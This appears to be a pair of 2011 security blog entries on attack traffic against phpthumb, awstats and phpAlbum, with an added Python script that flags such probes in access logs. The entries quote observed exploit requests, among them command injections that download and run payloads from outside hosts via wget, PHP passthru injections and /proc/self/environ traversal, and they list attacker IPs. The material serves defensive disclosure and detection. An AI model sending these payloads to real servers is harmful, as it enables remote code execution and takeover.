22 December 2011

New attempts to exploit old phpthumb vulnerabilities

After several weeks of heavy scanning for awstats vulnerabilities that reminded us of the importance of patching, followed by some scanners trying to exploit phpAlbum vulnerabilities, we now have seen thousands of attempts to exploit a phpthumb vulnerability first reported by Secunia in April 2010 as CVE-2010-1598. (Hey, give these guys some credit… they started out using the awstats vulnerability that was first discovered in 2006… maybe we should call this progress?)

The vulnerability text states that it is applicable to phpthumb version <= 1.7.9.  The current version is 1.7.11 and is available for download here. If you are using phpthumb, upgrade to the latest version to avoid becoming a victim.  

The requests I have seen are typically as follows:  

GET /admin/phpthumb/phpthumb.php?fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; & src=file.jpg & phpThumbDebug=9

GET /lib/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; & phpThumbDebug=9  

IPs seen today were as follows:

91.121.61.223
202.131.87.70


19 December 2011

Attacks against awstats also include attacks against phpAlbum

Following up on a post from last Friday regarding the importance of patching, I thought I would update some of the activity we are seeing from the various folks running scans for the awstats vulnerabilities previously mentioned. It seems that in addition to looking for the various awstats vulnerabilities, the scanners have now added some searches for some vulnerabilities in phpAlbum that were disclosed on Exploit DB at the end of October.

If you look at the requests made of main.php (below), you can see that the scanner is trying to do PHP code injection to identify vulnerable systems for later exploitation. According to the phpAlbum web site this bug has already been fixed, but I have not independently verified that information.  That being said, it would seem prudent to upgrade your version of phpAlbum. 

Since phpAlbum is frequently used with Joomla installations, this is probably closely related to similar activity that Ryan Barnett pointed out recently on the Spiderlabs blog. Note that the scanner is also trying a directory traversal attempt with index.php.

GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpalbum/main.php?var1=1'.passthru('id').';&cmd=setquality
GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /catalog/
GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo|
GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ[[#0]]
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ
GET /?mod=../../../../../../proc/self/environ[[#0]]
GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /site.php?a={${passthru(chr(105).chr(100))}}
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
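The request lines quoted in both diary entries (the phpthumb fltr[] probes above and the awstats, awstatstotals, phpAlbum and /proc/self/environ probes in this list) are easy to pick out of a web server log once the query string is decoded and each parameter is checked against the pattern the probe relies on. The script below is an added example, not code from the diary: it parses combined-format access log lines, classifies each request target, and reports which signatures each source IP triggered. The signature names, the regular expressions and the sample log lines (RFC 5737 addresses, fixed timestamps, the phpthumb payload cut off after its first injected command) are all constructed for this example; the request targets themselves are the ones quoted in the diary.

```python
"""Flag the awstats, awstatstotals, phpAlbum and phpthumb probes from the
diary in Apache/nginx combined-format access logs (added example)."""
import re
from urllib.parse import unquote, urlsplit

# Combined Log Format.  The request target is captured lazily up to the
# protocol token so the unencoded spaces in the phpthumb probes survive.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) (?P<proto>HTTP/\d\.\d)"'
)

# phpthumb legitimately uses '|' to separate filter arguments (fltr[]=blur|9),
# so only shell separators that have no business in a filter spec are flagged.
SHELL_META = re.compile(r'[;`]|\$\(')


def parse_query(query):
    """Split a raw query string into decoded (key, value) pairs, tolerating the
    stray spaces around '&' seen in some of the observed requests."""
    pairs = []
    for part in query.split('&'):
        key, _, value = part.partition('=')
        pairs.append((unquote(key).strip(), unquote(value).strip()))
    return pairs


def classify_target(target):
    """Return the list of (constructed) signature names matched by one request target."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    params = parse_query(parts.query)
    decoded = unquote(target)
    hits = []
    for key, value in params:
        if path.endswith('phpthumb.php') and key == 'fltr[]' and SHELL_META.search(value):
            hits.append('phpthumb-fltr-command-injection')       # CVE-2010-1598 pattern
        elif path.endswith('awstats.pl') and key == 'configdir' and value.startswith('|'):
            hits.append('awstats-configdir-command-injection')
        elif path.endswith('awstatstotals.php') and key == 'sort' and '${' in value:
            hits.append('awstatstotals-sort-code-injection')
        elif path.endswith('main.php') and key == 'var1' and ("'." in value or 'passthru(' in value):
            hits.append('phpalbum-var1-php-injection')
    if '../' in decoded and '/proc/self/environ' in decoded:
        hits.append('traversal-proc-self-environ')
    # Catch-all for the same PHP payload aimed at a path the rules above do not name.
    if not hits and 'passthru(' in decoded:
        hits.append('generic-php-passthru-injection')
    return hits


def scan_log(lines):
    """Map each source IP to the sorted list of signatures its requests triggered."""
    findings = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_target(m.group('target'))
        if hits:
            findings.setdefault(m.group('ip'), set()).update(hits)
    return {ip: sorted(sigs) for ip, sigs in findings.items()}


# Constructed sample log lines: RFC 5737 addresses and fixed timestamps; the
# request targets are the probes quoted in the diary (the phpthumb payload is
# truncated after the first injected command).  One benign phpthumb request
# is included to show that the normal 'blur|9' filter syntax is not flagged.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Dec/2011:10:01:02 +0000] "GET /lib/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp; & phpThumbDebug=9 HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.10 - - [22/Dec/2011:10:01:03 +0000] "GET /lib/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9&w=100 HTTP/1.1" 200 4096 "-" "-"',
    '192.0.2.20 - - [19/Dec/2011:08:15:00 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1" 404 210 "-" "-"',
    '192.0.2.20 - - [19/Dec/2011:08:15:01 +0000] "GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 210 "-" "-"',
    '192.0.2.20 - - [19/Dec/2011:08:15:02 +0000] "GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 210 "-" "-"',
    '192.0.2.20 - - [19/Dec/2011:08:15:03 +0000] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 210 "-" "-"',
    '192.0.2.20 - - [19/Dec/2011:08:15:04 +0000] "GET /site.php?a={${passthru(chr(105).chr(100))}} HTTP/1.1" 404 210 "-" "-"',
    '192.0.2.30 - - [19/Dec/2011:08:20:00 +0000] "GET /index.php HTTP/1.1" 200 3000 "-" "-"',
]

if __name__ == '__main__':
    for ip, sigs in sorted(scan_log(SAMPLE_LOG).items()):
        print(ip, ', '.join(sigs))
```

Run it against a real access log with `scan_log(open('access.log'))`. The rules are deliberately tied to the parameter each probe abuses (configdir beginning with a pipe, fltr[] carrying a shell separator, var1 breaking out of a quoted string) rather than to the literal payloads, so rewording the commands or hosting the dropper elsewhere does not evade them; the benign `fltr[]=blur|9&w=100` request shows why the pipe character alone is not a usable indicator for phpthumb.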


Some additional IPs we have seen involved in this activity are as follows: 

220.162.244.251
218.77.120.135
82.130.140.90
78.46.104.76
202.213.205.172
62.48.74.126
190.196.30.122
209.109.129.166